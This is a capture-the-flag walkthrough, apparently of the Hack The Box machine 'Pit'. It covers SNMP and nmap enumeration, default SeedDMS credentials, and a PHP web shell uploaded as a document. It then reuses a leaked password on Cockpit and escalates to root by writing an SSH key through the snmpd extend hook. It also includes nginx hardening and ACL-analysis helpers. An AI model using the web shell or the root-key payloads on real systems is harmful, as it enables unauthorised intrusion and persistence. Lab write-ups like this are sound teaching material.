NMAP
...

Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 22:00 IST
Nmap scan report for 10.10.10.241
Host is up (0.13s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p

SNMP
...

PORT    STATE SERVICE
161/udp open  snmp
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|_  5: 
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 76
|_  snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 37.94s (3794 timeticks)

SNMP
...

snmpwalk -v2c -c public 10.10.10.241 . | tee snmpwalk.out   

Pasted image 20240214222814.png
It looks like snmpd is executing /usr/bin/monitor through the NET-SNMP extend mechanism; the output can be seen below.
Pasted image 20240214222846.png

I also found a directory, /var/www/html/seeddms51x/seeddms.
Pasted image 20240214222913.png

I did not find SeedDMS when I tried the URL with the IP address: http://10.10.10.241/seeddms51x/seeddms
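A full snmpwalk dump runs to thousands of OIDs, and the two leads above (the extend command and the SeedDMS path) are easy to miss in it. As an added example, not part of the original notes, here is a small bash triage helper that pulls out exactly those fields. SAMPLE_WALK is a constructed dump in snmpwalk's default output format: the object names are real NET-SNMP and HOST-RESOURCES objects, the values are made up for the example.

```bash
#!/usr/bin/env bash
# Triage a saved snmpwalk dump so the useful leaks stand out: the commands
# snmpd's extend mechanism will run, binaries in the process table, and
# process arguments that carry filesystem paths.
# Added example, not part of the original notes. SAMPLE_WALK is a constructed
# dump in snmpwalk's default "MIB::object.index = TYPE: value" format.
set -eu

SAMPLE_WALK='SNMPv2-MIB::sysName.0 = STRING: pit.htb
HOST-RESOURCES-MIB::hrSWRunPath.1234 = STRING: "/usr/sbin/nginx"
HOST-RESOURCES-MIB::hrSWRunParameters.1234 = STRING: "-g daemon off;"
HOST-RESOURCES-MIB::hrSWRunPath.2345 = STRING: "/usr/sbin/php-fpm"
HOST-RESOURCES-MIB::hrSWRunParameters.2345 = STRING: "--nodaemonize"
HOST-RESOURCES-MIB::hrSWRunPath.3456 = STRING: "/usr/bin/sleep"
HOST-RESOURCES-MIB::hrSWRunParameters.3456 = STRING: "/var/www/html/seeddms51x/seeddms"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."monitoring" = STRING: Memory Usage
UCD-SNMP-MIB::dskPath.1 = STRING: /'

# All functions read snmpwalk output on stdin.

# snmp_extend_commands: "<extend name> -> <command>" for each extend entry.
# Whatever is listed here is executed on the target every time the
# nsExtendObjects subtree is walked, so it is the first thing to check.
snmp_extend_commands() {
    sed -n 's/^NET-SNMP-EXTEND-MIB::nsExtendCommand\."\([^"]*\)" = STRING: \(.*\)$/\1 -> \2/p'
}

# snmp_run_paths: unique binaries from the process table (hrSWRunPath).
snmp_run_paths() {
    sed -n 's/^HOST-RESOURCES-MIB::hrSWRunPath\.[0-9][0-9]* = STRING: "\(.*\)"$/\1/p' | sort -u
}

# snmp_path_args: "<pid> <args>" for processes whose arguments contain a
# slash; web roots, config files and scripts tend to leak here.
snmp_path_args() {
    sed -n 's/^HOST-RESOURCES-MIB::hrSWRunParameters\.\([0-9][0-9]*\) = STRING: "\(.*\)"$/\1 \2/p' \
        | { grep '/' || true; }
}

# Run against the sample; for the real dump use e.g.
#   snmp_extend_commands < snmpwalk.out
printf '== extend commands ==\n'
printf '%s\n' "$SAMPLE_WALK" | snmp_extend_commands
printf '== binaries ==\n'
printf '%s\n' "$SAMPLE_WALK" | snmp_run_paths
printf '== args with paths ==\n'
printf '%s\n' "$SAMPLE_WALK" | snmp_path_args
```

Feed it the saved snmpwalk.out (`snmp_extend_commands < snmpwalk.out`); anything the extend section lists is code the box runs on demand, which is what the privilege escalation later relies on.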

Took a look at the port 9090 certificate: the CN and SAN give the hostname dms-pit.htb.
Pasted image 20240214223243.png
Added it to /etc/hosts.

Pasted image 20240214223310.png

In the SNMP output I also found a username, michelle.
Pasted image 20240214223345.png
I'll try the username as the password (michelle:michelle).

michelle:michelle worked.

Pasted image 20240214223430.png

Did a searchsploit against SeedDMS.
Pasted image 20240214223657.png

The RCE sticks out, but the target runs a newer version, 5.1.15.

Pasted image 20240214223454.png

Downloaded the changelog.

Pasted image 20240214223920.png

The fix they added is a .htaccess file. That won't help here: the target runs nginx, not Apache, and nginx ignores .htaccess files entirely, so the .htaccess does nothing and uploaded PHP will still execute.
Pasted image 20240214224040.png
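Because nginx never reads .htaccess, the equivalent protection has to live in the nginx server block itself. The following is an added example, not SeedDMS's shipped configuration and not the target's real config: the web root and SeedDMS path follow this writeup, the php-fpm socket path is an assumption. The weak handler is shown commented out next to the hardened one.

```nginx
server {
    listen 80;
    server_name dms-pit.htb;
    root /var/www/html;
    index index.php index.html;

    # Weak (how the target behaves): every *.php under the web root is
    # handed to PHP-FPM, including files users uploaded into data/.
    #
    # location ~ \.php$ {
    #     fastcgi_pass unix:/run/php-fpm/www.sock;   # assumed socket path
    #     include fastcgi_params;
    #     fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    # }

    # Hardened: nothing under the upload tree is served or executed.
    # nginx uses the first matching regex location in file order, so this
    # block must come before the generic PHP handler below.
    location ~ ^/seeddms51x/data/ {
        deny all;
    }

    location ~ \.php$ {
        try_files $uri =404;                       # never execute a non-existent path
        fastcgi_pass unix:/run/php-fpm/www.sock;   # assumed socket path
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```

Denying data/ does not break SeedDMS, which reads and serves document files through its own PHP scripts rather than by direct URL. Better still is to keep the content directory outside the web root altogether, which SeedDMS supports through the content directory path in settings.xml; then there is nothing for any web server to execute.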

To get code execution I need to upload a document, and the document itself can be a PHP backdoor, since uploads are stored under the web root with their original extension.

I added this as a document:

<?php
// Minimal web shell: run the value of the cmd parameter and return its output.
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Pasted image 20240214224643.png
Add document.

The backdoor can be reached directly in the data directory, but first we need to know the document id.

Hovering the mouse over the file name shows the document id in the link; mine is 29.
Pasted image 20240214224814.png

Change the document id in the URL below (SeedDMS stores the upload as data/1048576/<document id>/<version>.<extension>, hence 1.php for version 1):
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id
Pasted image 20240214224959.png
I tried to get a reverse shell but was not able to, probably some kind of egress firewall, so I used the web shell I had to hunt for credentials.

There is a conf directory.
Pasted image 20240214225220.png

which has a settings.xml.
Pasted image 20240214225334.png

Did not find credentials in settings.xml

Enumerating further, there is another conf directory one level higher, reachable from the web shell's directory as
../../../conf/settings.xml

Pasted image 20240214225602.png

I'll check for password reuse with the password from that settings.xml.
On port 9090 it worked with michelle:ied^ieY6xoquu

PORT 9090
...

Pasted image 20240214225700.png
Pasted image 20240214225813.png

I have a web terminal (this is Cockpit, the Red Hat web console that was listening on 9090).
Pasted image 20240214225923.png

I remember from the earlier SNMP scan that snmpd was executing /usr/bin/monitor.

Pasted image 20240214230024.png
It executes every file in /usr/local/monitoring whose name starts with check and ends with sh.
At first I was stuck because there seemed to be no write permission on /usr/local/monitoring, but getfacl gave a clearer picture.

[michelle@pit ~]$ ls -la /usr/local/ | grep monitoring
drwxrwx---+  2 root root 101 Feb 14 12:30 monitoring

Because of the + in the permission string I used getfacl; the + means there are additional ACL entries set on the directory.

[michelle@pit ~]$ getfacl /usr/local/monitoring
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---

michelle can write and execute, but can't read, which is why I got an error whenever I tried to list or read anything in the directory. Write plus execute on a directory is still enough to create a new file there by name, even though the directory cannot be listed.

Pasted image 20240214230705.png
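Reading getfacl output by eye is error-prone because a named-user entry is only what the user gets after the mask:: line is applied. As an added example, not from the original notes, here is a bash helper that computes the effective permissions the way the kernel does. ACL_MONITORING is constructed to match the getfacl output above; ACL_MASKED is the same entry with a restrictive mask, to show why the mask line must be read too.

```bash
#!/usr/bin/env bash
# Work out what a POSIX ACL actually grants a user, applying mask:: the way
# the kernel does. Added example, not from the original notes; ACL_MONITORING
# is constructed to match the getfacl output above, ACL_MASKED is the same
# entry with a restrictive mask.
set -eu

ACL_MONITORING='# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---'

ACL_MASKED='# file: usr/local/monitoring
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::r-x
other::---'

# and_perms A B: bitwise AND of two rwx triplets, e.g. "-wx" "r-x" -> "--x".
and_perms() {
    local a=$1 b=$2 out="" i
    for i in 0 1 2; do
        if [ "${a:$i:1}" != "-" ] && [ "${b:$i:1}" != "-" ]; then
            out="$out${a:$i:1}"
        else
            out="$out-"
        fi
    done
    printf '%s\n' "$out"
}

# effective_perms USER: reads getfacl text on stdin and prints the rwx
# triplet USER ends up with. Named-user entries (and all group entries) are
# ANDed with mask::; the owning user:: and other:: entries are not.
effective_perms() {
    local user=$1 line named="" mask="rwx"
    while IFS= read -r line; do
        case $line in
            "user:$user:"*) named=${line##*:} ;;
            "mask::"*)      mask=${line##*:} ;;
        esac
    done
    if [ -z "$named" ]; then
        printf 'no named ACL entry for %s\n' "$user" >&2
        return 1
    fi
    and_perms "$named" "$mask"
}

# Directory semantics of the resulting triplet: r lists entries, w creates or
# removes entries, x traverses (cd into it, open a known name inside it).
can_read()  { [ "${1:0:1}" = "r" ]; }
can_write() { [ "${1:1:1}" = "w" ]; }
can_exec()  { [ "${1:2:1}" = "x" ]; }

# Demo: michelle's effective rights under both masks.
printf 'mask rwx: michelle -> %s\n' "$(printf '%s\n' "$ACL_MONITORING" | effective_perms michelle)"
printf 'mask r-x: michelle -> %s\n' "$(printf '%s\n' "$ACL_MASKED" | effective_perms michelle)"
```

With the mask of rwx on the real directory michelle keeps -wx, so a new check_*.sh can be created there even though ls fails; had the mask been r-x, the same named entry would have collapsed to --x and the directory would have been useless for this attack.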

Now I'll run snmpwalk on the extend subtree again and hope my commands get executed, with a hello showing up in the output as confirmation.

snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects 

Pasted image 20240214230807.png

I tried a reverse shell again but it did not work (firewall), so instead I inserted my SSH key on the target.

echo 'echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1xuyTpxCQbJ+o0 > /root/.ssh/authorized_keys' > check_hello.sh

After running the snmpwalk command the SSH key was written to /root/.ssh/authorized_keys. Note that the script has to be created inside /usr/local/monitoring, and that the single > overwrites any key root already had there.
Pasted image 20240214231837.png
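The one-liner above works, but it clobbers root's existing authorized_keys and can't be tested before the snmpwalk fires it as root. As an added example, not the notes' original payload, here is a bash helper that generates a safer check_*.sh (appends instead of overwriting, idempotent, creates /root/.ssh with tight permissions if needed) and rehearses it against a scratch directory first. The public key is the one from the notes; the target directory is a parameter only so the rehearsal can run locally.

```bash
#!/usr/bin/env bash
# Build the check_*.sh payload for the snmpd extend hook and rehearse it
# locally before dropping it into /usr/local/monitoring.
# Added example, not the notes' original one-liner. Differences: it appends
# to authorized_keys (>>) instead of clobbering any key root already has,
# it is idempotent if the walk fires more than once, and it creates
# /root/.ssh with restrictive permissions in case it does not exist yet.
set -eu

# Public key from the notes. Only the public half ever touches the target.
PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKcfMwIbRY6rYQ2lRnLmzzJKA5HAYC1xuyTpxCQbJ+o0'

# write_payload OUT_SCRIPT TARGET_SSH_DIR PUBKEY
# Emits the script that /usr/bin/monitor will run as root. TARGET_SSH_DIR is
# a parameter only so the same payload can be rehearsed against a scratch
# directory; on the target it is /root/.ssh.
write_payload() {
    local out=$1 sshdir=$2 key=$3
    cat >"$out" <<EOF
#!/bin/sh
# Runs as root: snmpd extend -> /usr/bin/monitor -> /usr/local/monitoring/check*sh
umask 077
mkdir -p '$sshdir'
# Append rather than overwrite, and only once.
grep -qxF '$key' '$sshdir/authorized_keys' 2>/dev/null || printf '%s\n' '$key' >> '$sshdir/authorized_keys'
chmod 700 '$sshdir'
chmod 600 '$sshdir/authorized_keys'
EOF
}

# rehearse: run the payload twice against a temp .ssh dir that already holds
# one key, and print how many keys are there afterwards (expect 2: the
# pre-existing key is kept, ours is added exactly once).
rehearse() {
    local tmp script
    tmp=$(mktemp -d)
    mkdir -p "$tmp/.ssh"
    printf 'ssh-ed25519 AAAAexistingkeyplaceholder existing@host\n' >"$tmp/.ssh/authorized_keys"
    script="$tmp/check_hello.sh"
    write_payload "$script" "$tmp/.ssh" "$PUBKEY"
    sh "$script"
    sh "$script"
    wc -l <"$tmp/.ssh/authorized_keys" | tr -d ' '
    rm -rf "$tmp"
}

printf 'keys in authorized_keys after rehearsal: %s\n' "$(rehearse)"
# On the target (as michelle, who has -wx on the directory):
#   write_payload /usr/local/monitoring/check_hello.sh /root/.ssh "$PUBKEY"
# then trigger it with:
#   snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects
```

Because michelle cannot read /usr/local/monitoring, there is no way to confirm the file landed with ls; the rehearsal is the only check you get before the walk runs it as root, which is why the payload is kept to commands that cannot half-fail into a broken authorized_keys.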

Root